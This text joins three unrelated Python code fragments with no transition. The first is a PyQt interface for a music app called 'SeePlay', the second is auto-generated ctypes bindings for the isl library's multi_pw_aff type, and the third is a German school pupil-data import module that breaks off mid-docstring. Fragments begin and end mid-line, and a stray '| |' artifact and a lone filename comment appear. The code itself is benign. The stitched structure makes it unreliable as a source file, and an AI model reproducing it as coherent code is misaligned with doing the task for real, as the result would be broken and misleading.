mode.move(window_w*0.33, (mode_slot * boxheight) + 15)
mode.setText('Mode: ')
mode.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.modebox = QtGui.QComboBox(self)
self.modebox.resize(window_w*0.5,boxheight)
self.modebox.move(window_w*0.33 + window_w*0.16, (mode_slot * boxheight) + 15)
sorted_modes = collections.OrderedDict(self.mode_types)
for key, value in sorted_modes.iteritems():
self.modebox.addItem(key)
self.modebox.activated[str].connect(lambda: self.set_user_mode(self.modebox.currentText()))
# Key
prog = QtGui.QLabel(self)
prog.resize(window_w*0.16,boxheight)
prog.move(window_w*0.33, (prog_slot * boxheight) + 15)
prog.setText('Progression: ')
prog.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.progbox = QtGui.QComboBox(self)
self.progbox.resize(window_w*0.5,boxheight)
self.progbox.move(window_w*0.33 + window_w*0.16, (prog_slot * boxheight) + 15)
sorted_prog = collections.OrderedDict(self.prog_types)
for key, value in sorted_prog.iteritems():
self.progbox.addItem(key)
self.progbox.activated[str].connect(lambda: self.set_user_prog_type(self.progbox.currentText()))
# Time sig
sig = QtGui.QLabel(self)
sig.resize(window_w*0.16,boxheight)
sig.move(window_w*0.33, (tsig_slot * boxheight) + 15)
sig.setText('Time signature: ')
sig.setStyleSheet("QLabel { padding: 5px; font-size: 12px; text-align: center; color: #FFFFFF; }")
self.sigbox = QtGui.QComboBox(self)
self.sigbox.resize(window_w*0.5,boxheight)
self.sigbox.move(window_w*0.33 + window_w*0.16, (tsig_slot * boxheight) + 15)
# self.sigbox.addItem("3/4")
self.sigbox.addItem("4/4")
# self.sigbox.addItem("5/4")
self.sigbox.setCurrentIndex(0)
self.sigbox.activated[str].connect(lambda: self.set_user_tsig(self.sigbox.currentText()))
# Tempo
self.tempo = QtGui.QLabel(self)
self.tempo.resize(window_w*0.16,boxheight)
self.tempo.move(window_w*0.33, (tempo_slot * boxheight) + 15)
self.tempo.setText('Tempo: ')
self.tempo.setStyleSheet("QLabel { padding: 5px; font-size: 8px; text-align: center; color: #FFFFFF; }")
self.tempobox = QtGui.QSlider(QtCore.Qt.Horizontal, self)
self.tempobox.setFocusPolicy(QtCore.Qt.NoFocus)
self.tempobox.resize(window_w*0.5,boxheight)
self.tempobox.move(window_w*0.33 + window_w*0.16, (tempo_slot * boxheight) + 15)
self.tempobox.setMinimum(60)
self.tempobox.setMaximum(180)
self.tempobox.setValue(120)
# self.tempobox.setGeometry(30, 40, 100, 30)
self.tempobox.valueChanged[int].connect(lambda: self.set_user_tempo(self.tempobox.value()))
# self.tempobox = QtGui.QComboBox(self)
# self.tempobox.addItem("Slow (80 bpm)")
# self.tempobox.addItem("Normal (120 bpm)")
# self.tempobox.addItem("Fast (160 bpm)")
# self.tempobox.setCurrentIndex(1)
# self.tempobox.activated[str].connect(lambda: self.set_user_tempo(self.tempobox.currentText()))
# General info
# geninfo = QtGui.QLabel(self)
# geninfo.resize(window_w*0.68,boxheight * 4)
# geninfo.move(window_w*0.33,(geninfo_slot * boxheight) + 20)
# geninfo.setText('General info ')
# geninfo.setStyleSheet("QLabel { padding: 5px; font-size: 12px; background-color: rgba(200, 200, 200, 150); color: #FFFFFF; }")
# CREDZ
stitle2 = QtGui.QLabel(self)
stitle2.resize(160,20)
stitle2.move(window_w-stitle2.width(),window_h-stitle2.height())
stitle2.setText('SeePlay by <NAME>, 2014')
stitle2.setStyleSheet("QLabel { padding: 2px; font-size: 10px; text-align: right; color: #CCCCCC; }")
self.set_initial_vars()
self.show()
def open_mixer(self):
print "Opening mixer."
mix_w = 400
row_w = mix_w / 4
row_h = 30
mix_h = row_h * 10
firstcolx = 0
secondcolx = row_w
thirdcolx = row_w * 2
title_slot = 0
stitle_slot = 1
header_slot = 2
drums_slot = 3
bass_slot | |
arg0.ctx
res = isl.isl_multi_pw_aff_has_range_tuple_id(arg0.ptr)
if res < 0:
raise
return bool(res)
def identity(*args):
if len(args) == 1:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_identity_multi_pw_aff(isl.isl_multi_pw_aff_copy(args[0].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
@staticmethod
def identity_on_domain(*args):
if len(args) == 1 and args[0].__class__ is space:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_identity_on_domain_space(isl.isl_space_copy(args[0].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def insert_domain(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is space:
arg1 = space(arg1)
except:
return multi_union_pw_aff(arg0).insert_domain(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_insert_domain(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_space_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def intersect_domain(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is set:
arg1 = set(arg1)
except:
return multi_union_pw_aff(arg0).intersect_domain(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_intersect_domain(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_set_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def intersect_params(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is set:
arg1 = set(arg1)
except:
return multi_union_pw_aff(arg0).intersect_params(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_intersect_params(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_set_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def involves_nan(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_involves_nan(arg0.ptr)
if res < 0:
raise
return bool(res)
def involves_param(*args):
if len(args) == 2 and (args[1].__class__ is id or type(args[1]) == str):
args = list(args)
try:
if not args[1].__class__ is id:
args[1] = id(args[1])
except:
raise
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_involves_param_id(args[0].ptr, args[1].ptr)
if res < 0:
raise
return bool(res)
if len(args) == 2 and args[1].__class__ is id_list:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_involves_param_id_list(args[0].ptr, args[1].ptr)
if res < 0:
raise
return bool(res)
raise Error
def isa_multi_aff(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_isa_multi_aff(arg0.ptr)
if res < 0:
raise
return bool(res)
def list(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_get_list(arg0.ptr)
obj = pw_aff_list(ctx=ctx, ptr=res)
return obj
def get_list(arg0):
return arg0.list()
def max(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).max(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_max(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def max_multi_val(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_max_multi_val(isl.isl_multi_pw_aff_copy(arg0.ptr))
obj = multi_val(ctx=ctx, ptr=res)
return obj
def min(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).min(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_min(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def min_multi_val(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_min_multi_val(isl.isl_multi_pw_aff_copy(arg0.ptr))
obj = multi_val(ctx=ctx, ptr=res)
return obj
def neg(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_neg(isl.isl_multi_pw_aff_copy(arg0.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def plain_is_equal(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).plain_is_equal(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_plain_is_equal(arg0.ptr, arg1.ptr)
if res < 0:
raise
return bool(res)
def product(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).product(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_product(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def pullback(*args):
if len(args) == 2 and args[1].__class__ is multi_aff:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_pullback_multi_aff(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_multi_aff_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
if len(args) == 2 and args[1].__class__ is multi_pw_aff:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_pullback_multi_pw_aff(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_multi_pw_aff_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
if len(args) == 2 and args[1].__class__ is pw_multi_aff:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_pullback_pw_multi_aff(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_pw_multi_aff_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def range_product(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).range_product(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_range_product(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def range_tuple_id(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_get_range_tuple_id(arg0.ptr)
obj = id(ctx=ctx, ptr=res)
return obj
def get_range_tuple_id(arg0):
return arg0.range_tuple_id()
def reset_range_tuple_id(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_reset_range_tuple_id(isl.isl_multi_pw_aff_copy(arg0.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def scale(*args):
if len(args) == 2 and args[1].__class__ is multi_val:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_scale_multi_val(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_multi_val_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
if len(args) == 2 and (args[1].__class__ is val or type(args[1]) == int):
args = list(args)
try:
if not args[1].__class__ is val:
args[1] = val(args[1])
except:
raise
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_scale_val(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_val_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def scale_down(*args):
if len(args) == 2 and args[1].__class__ is multi_val:
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_scale_down_multi_val(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_multi_val_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
if len(args) == 2 and (args[1].__class__ is val or type(args[1]) == int):
args = list(args)
try:
if not args[1].__class__ is val:
args[1] = val(args[1])
except:
raise
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_scale_down_val(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_val_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def set_at(arg0, arg1, arg2):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg2.__class__ is pw_aff:
arg2 = pw_aff(arg2)
except:
return multi_union_pw_aff(arg0).set_at(arg1, arg2)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_set_at(isl.isl_multi_pw_aff_copy(arg0.ptr), arg1, isl.isl_pw_aff_copy(arg2.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def set_range_tuple(*args):
if len(args) == 2 and (args[1].__class__ is id or type(args[1]) == str):
args = list(args)
try:
if not args[1].__class__ is id:
args[1] = id(args[1])
except:
raise
ctx = args[0].ctx
res = isl.isl_multi_pw_aff_set_range_tuple_id(isl.isl_multi_pw_aff_copy(args[0].ptr), isl.isl_id_copy(args[1].ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
raise Error
def size(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_size(arg0.ptr)
if res < 0:
raise
return int(res)
def space(arg0):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_get_space(arg0.ptr)
obj = space(ctx=ctx, ptr=res)
return obj
def get_space(arg0):
return arg0.space()
def sub(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).sub(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_sub(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def unbind_params_insert_domain(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_id:
arg1 = multi_id(arg1)
except:
return multi_union_pw_aff(arg0).unbind_params_insert_domain(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_unbind_params_insert_domain(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_id_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
def union_add(arg0, arg1):
try:
if not arg0.__class__ is multi_pw_aff:
arg0 = multi_pw_aff(arg0)
except:
raise
try:
if not arg1.__class__ is multi_pw_aff:
arg1 = multi_pw_aff(arg1)
except:
return multi_union_pw_aff(arg0).union_add(arg1)
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_union_add(isl.isl_multi_pw_aff_copy(arg0.ptr), isl.isl_multi_pw_aff_copy(arg1.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
@staticmethod
def zero(arg0):
try:
if not arg0.__class__ is space:
arg0 = space(arg0)
except:
raise
ctx = arg0.ctx
res = isl.isl_multi_pw_aff_zero(isl.isl_space_copy(arg0.ptr))
obj = multi_pw_aff(ctx=ctx, ptr=res)
return obj
isl.isl_multi_pw_aff_from_aff.restype = c_void_p
isl.isl_multi_pw_aff_from_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_from_multi_aff.restype = c_void_p
isl.isl_multi_pw_aff_from_multi_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_from_pw_aff.restype = c_void_p
isl.isl_multi_pw_aff_from_pw_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_from_pw_aff_list.restype = c_void_p
isl.isl_multi_pw_aff_from_pw_aff_list.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_from_pw_multi_aff.restype = c_void_p
isl.isl_multi_pw_aff_from_pw_multi_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_read_from_str.restype = c_void_p
isl.isl_multi_pw_aff_read_from_str.argtypes = [Context, c_char_p]
isl.isl_multi_pw_aff_add.restype = c_void_p
isl.isl_multi_pw_aff_add.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_add_constant_multi_val.restype = c_void_p
isl.isl_multi_pw_aff_add_constant_multi_val.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_add_constant_val.restype = c_void_p
isl.isl_multi_pw_aff_add_constant_val.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_as_map.restype = c_void_p
isl.isl_multi_pw_aff_as_map.argtypes = [c_void_p]
isl.isl_multi_pw_aff_as_multi_aff.restype = c_void_p
isl.isl_multi_pw_aff_as_multi_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_as_set.restype = c_void_p
isl.isl_multi_pw_aff_as_set.argtypes = [c_void_p]
isl.isl_multi_pw_aff_get_at.restype = c_void_p
isl.isl_multi_pw_aff_get_at.argtypes = [c_void_p, c_int]
isl.isl_multi_pw_aff_bind.restype = c_void_p
isl.isl_multi_pw_aff_bind.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_bind_domain.restype = c_void_p
isl.isl_multi_pw_aff_bind_domain.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_bind_domain_wrapped_domain.restype = c_void_p
isl.isl_multi_pw_aff_bind_domain_wrapped_domain.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_coalesce.restype = c_void_p
isl.isl_multi_pw_aff_coalesce.argtypes = [c_void_p]
isl.isl_multi_pw_aff_domain.restype = c_void_p
isl.isl_multi_pw_aff_domain.argtypes = [c_void_p]
isl.isl_multi_pw_aff_flat_range_product.restype = c_void_p
isl.isl_multi_pw_aff_flat_range_product.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_gist.restype = c_void_p
isl.isl_multi_pw_aff_gist.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_has_range_tuple_id.argtypes = [c_void_p]
isl.isl_multi_pw_aff_identity_multi_pw_aff.restype = c_void_p
isl.isl_multi_pw_aff_identity_multi_pw_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_identity_on_domain_space.restype = c_void_p
isl.isl_multi_pw_aff_identity_on_domain_space.argtypes = [c_void_p]
isl.isl_multi_pw_aff_insert_domain.restype = c_void_p
isl.isl_multi_pw_aff_insert_domain.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_intersect_domain.restype = c_void_p
isl.isl_multi_pw_aff_intersect_domain.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_intersect_params.restype = c_void_p
isl.isl_multi_pw_aff_intersect_params.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_involves_nan.argtypes = [c_void_p]
isl.isl_multi_pw_aff_involves_param_id.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_involves_param_id_list.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_isa_multi_aff.argtypes = [c_void_p]
isl.isl_multi_pw_aff_get_list.restype = c_void_p
isl.isl_multi_pw_aff_get_list.argtypes = [c_void_p]
isl.isl_multi_pw_aff_max.restype = c_void_p
isl.isl_multi_pw_aff_max.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_max_multi_val.restype = c_void_p
isl.isl_multi_pw_aff_max_multi_val.argtypes = [c_void_p]
isl.isl_multi_pw_aff_min.restype = c_void_p
isl.isl_multi_pw_aff_min.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_min_multi_val.restype = c_void_p
isl.isl_multi_pw_aff_min_multi_val.argtypes = [c_void_p]
isl.isl_multi_pw_aff_neg.restype = c_void_p
isl.isl_multi_pw_aff_neg.argtypes = [c_void_p]
isl.isl_multi_pw_aff_plain_is_equal.argtypes = [c_void_p, c_void_p]
isl.isl_multi_pw_aff_product.restype = c_void_p
isl.isl_multi_pw_aff_product.argtypes = [c_void_p, c_void_p]
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
wz_compat/import_pupils.py - last updated 2019-12-03
Convert the pupil data from the form supplied by the school database.
Retain only the relevant fields, add additional fields needed by this
application.
==============================
Copyright 2019 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
## For correct sorting with umlauts etc. – not used here (use ASCII converter)
#import locale
#locale.setlocale (locale.LC_COLLATE, 'de_DE.UTF-8')
# Messages
_BADSCHOOLYEAR = "Falsches Jahr in Tabelle {filepath}"
_MISSINGDBFIELD = "Feld fehlt in Schüler-Tabelle {filepath}:\n {field}"
_FIELDMISSING = "Benötigtes Feld {field} fehlt in Rohdatentabelle:\n {path}"
_WRONGLENGTH = ("Tabellenzeile hat die falsche Länge.\n Felder: {fields}"
"\n Werte: {values}")
_CLASSGONE = "Klasse '{klass}' nicht mehr in der Schuldatenbank"
_NEWCLASS = "Kasse '{klass}' wird hinzugefügt"
_NOUPDATES = "Keine Änderungen in der Schülertabelle für Schuljahr {year}"
_REBUILDPUPILS = "Schülertabelle für Schuljahr {year} wird aktualisiert"
_NEWPUPILS = "Neue Schüler in Klasse {klass}:\n {pids}"
_PUPILCHANGES = "Änderungen in Klasse {klass}:\n {data}"
_OLDPUPILS = "Abmeldungen in Klasse {klass}:\n {pids}"
_DB_FIELD_MISSING = "PUPILS-Tabelle ohne Feld {field}"
_DB_FIELD_LOST = "PUPILS-Tabelle: Feld {field} wird nicht exportiert"
_IMPORT_FROM = "Importiere Schüler von Datei:\n {path}"
_BADCLASSNAME = "Ungülitige Klassenname: {name}"
_BAD_DATE = "Ungültiges Datum: Feld {tag}, Wert {val} in:\n {path}"
# Info tag in spreadsheet table
_SCHOOLYEAR = "Schuljahr"
# Spreadsheet configuration
_PUPIL_TABLE_TITLE = "** Schüler **"
import os, datetime
from collections import OrderedDict, UserDict
from glob import glob
from wz_core.configuration import Dates, Paths
from wz_core.db import DB
# To read/write spreadsheet tables:
from wz_table.dbtable import readDBTable, makeDBTable
def _getFieldmap ():
fmap = OrderedDict ()
for f, val in CONF.TABLES.PUPILS_FIELDNAMES.items ():
fmap [f] = val.upper ()
return fmap
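# Example: with a (hypothetical) CONF.TABLES.PUPILS_FIELDNAMES of
# {'FIRSTNAME': 'Vorname', 'LASTNAME': 'Name'}, _getFieldmap () returns
# OrderedDict ([('FIRSTNAME', 'VORNAME'), ('LASTNAME', 'NAME')]).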
# In Dutch there is a word for those little lastname prefixes like "von",
# "zu", "van" and "de": "tussenvoegsel". For sorting purposes these can be a
# bit annoying because they are often ignored, e.g. "<NAME>" would be
# sorted under "G".
####++++++++++++++++++++++++++++++++++++++++++++++++####
#### A surname splitter. This version regards the first capital letter as
#### the start of the name for sorting purposes. Thus o'Brien is seen as
#### ["o'", "Brien"], but O'Brien is seen as ["O'Brien"]!
#### To handle confusing cases, a manual (re)ordering should be possible.
#def usplit (name):
# i = 0
# for c in name:
# if c.isupper():
# if i == 0: return None, name
# if name [i-1] == ' ':
# return name [:i-1], name [i:]
# else:
# return name [:i], name [i:]
# i += 1
# print ('???', name)
# return None
#print (' -->', usplit ('<NAME>'))
#print (' -->', usplit ('<NAME>'))
#print (' -->', usplit ("o'Riordan"))
#print (' -->', usplit ("O'Riordan"))
####------------------------------------------------####
# This is a custom name splitter for raw data which has the lastname
# prefixes at the end of the firstname(s). It uses a look-up table of
# prefix "words".
def tvSplitF (name):
"""Split a "tussenvoegsel" from the end of the first names.
Return a tuple: (Actual first names, tussenvoegsel or <None>).
"""
tvlist = list (CONF.MISC.TUSSENVOEGSEL)
ns = name.split ()
if len (ns) >= 1:
tv = []
i = 0
for s in reversed (ns):
if s in tvlist:
tv.insert (0, s)
i -= 1
else:
break
if i < 0:
return (" ".join (ns [:i]), " ".join (tv))
return (" ".join (ns), None) # ensure normalized spacing
class _IndexedDict (list):
"""A list which allows keyed access to its fields.
As the fields are a class attribute, this class can only be used for
one type of list. Here it is used for the fields of the raw pupil data.
Before instantiating, <setup> must be called to set up the field
names and indexes.
"""
_fields = None
@classmethod
def setup (cls, fields):
        if cls._fields is None:
cls._fields = {}
i = 0
for f in fields:
cls._fields [f] = i
i += 1
#### The main part of the class, dealing with instances:
def __init__ (self, values):
if len (values) != len (self._fields):
REPORT.Fail (_WRONGLENGTH, fields=repr (self._fields),
values=repr (values))
super ().__init__ (values)
def __getitem__ (self, key):
if type (key) == str:
return super (). __getitem__ (self._fields [key])
else:
return super (). __getitem__ (key)
def __setitem__ (self, key, value):
if type (key) == str:
return super (). __setitem__ (self._fields [key], value)
else:
return super (). __setitem__ (key, value)
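# Illustrative usage (field names are made up; note that the field layout is a
# class attribute, so only one layout can be active per run):
#   _IndexedDict.setup (['FIRSTNAME', 'LASTNAME'])
#   row = _IndexedDict (['Anna', 'Schmidt'])
#   row ['LASTNAME']            # -> 'Schmidt'
#   row [0]                     # -> 'Anna'
#   row ['LASTNAME'] = 'Meyer'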
def readRawPupils (schoolyear, filepath):
"""Read in a table containing raw pupil data for the whole school
from the given file (ods or xlsx, the file ending can be omitted).
The names of date fields are expected to end with '_D'. Values are
accepted in isoformat (YYYY-MM-DD, or %Y-%m-%d for <datetime>) or
in the format specified for output, config value FORMATTING.DATEFORMAT.
If a pupil left the school before the beginning of the school year
(s)he will be excluded from the list built here.
Build a mapping:
{classname -> ordered list of <_IndexedDict> instances}
The ordering of the pupil data is determined by the config file
TABLES/PUPILS_FIELDNAMES.
The fields supplied in the raw data are saved as the <fields>
attribute of the result.
"""
startdate = Dates.day1 (schoolyear)
# An exception is raised if there is no file:
table = readDBTable (filepath)
# Get ordered field list for the table.
# The config file has: internal name -> table name.
# All names are converted to upper case to enable case-free matching.
fieldMap = _getFieldmap ()
# Build a list of the field names which are used
fields = OrderedDict ()
colmap = []
# Read the (capitalised) column headers from this line
h_colix = {h.upper (): colix
for h, colix in table.headers.items ()}
datefields = []
for f, fx in fieldMap.items ():
try:
colmap.append (h_colix [fx])
fields [f] = fx
if f.endswith ('_D'):
datefields.append (f)
except:
# Field not present in raw data
if f == 'PSORT':
fields [f] = fx
colmap.append (None)
else:
REPORT.Warn (_FIELDMISSING, field=f, path=filepath)
### For sorting: use a translation table for non-ASCII characters
ttable = str.maketrans (dict (CONF.ASCII_SUB))
classes = UserDict () # for the results: {class -> [row item]}
classes.fields = fields
### Read the row data
ntuples = {}
_IndexedDict.setup (fields)
dateformat = CONF.FORMATTING.DATEFORMAT
for row in table:
rowdata = []
for col in colmap:
rowdata.append (None if col == None else row [col])
pdata = _IndexedDict (rowdata)
# Check date fields
for f in datefields:
val = pdata [f]
if val:
try:
datetime.date.fromisoformat (val)
except:
try:
pdata [f] = datetime.datetime.strptime (val,
dateformat).date ().isoformat ()
except:
REPORT.Fail (_BAD_DATE, tag=f, val=val, path=filepath)
## Exclude pupils who left before the start of the schoolyear
if pdata ['EXIT_D'] and pdata ['EXIT_D'] < startdate:
continue
## Name fixing
firstnames, tv = tvSplitF (pdata ['FIRSTNAMES'])
lastname = pdata ['LASTNAME']
firstname = tvSplitF (pdata ['FIRSTNAME']) [0]
if tv:
sortname = lastname + ' ' + tv + ' ' + firstname
pdata ['FIRSTNAMES'] = firstnames
pdata ['FIRSTNAME'] = firstname
pdata ['LASTNAME'] = tv + ' ' + lastname
else:
sortname = lastname + ' ' + firstname
pdata ['PSORT'] = sortname.translate (ttable)
klass = pdata ['CLASS']
# Normalize class name
try:
if not klass [0].isdigit ():
raise NameError
            if len (klass) == 1:
                k = '0' + klass
            else:
                k = klass if klass [1].isdigit () else '0' + klass
                if not (len (k) == 2 or k [2:].isalpha ()):
                    raise NameError
            pdata ['CLASS'] = k
except:
REPORT.Fail (_BADCLASSNAME, name=klass)
try:
classes [k].append (pdata)
except:
classes [k] = [pdata]
for klass in classes:
# alphabetical sorting
classes [klass].sort (key=lambda pd: pd ['PSORT'])
return classes
def updateFromRaw (schoolyear, rawdata):
"""Update the PUPILS table from the supplied raw pupil data.
Only the fields supplied in the raw data will be affected.
If there is no PUPILS table, create it, leaving fields for which no
    data is supplied
# data_utils/MyDataLoader.py
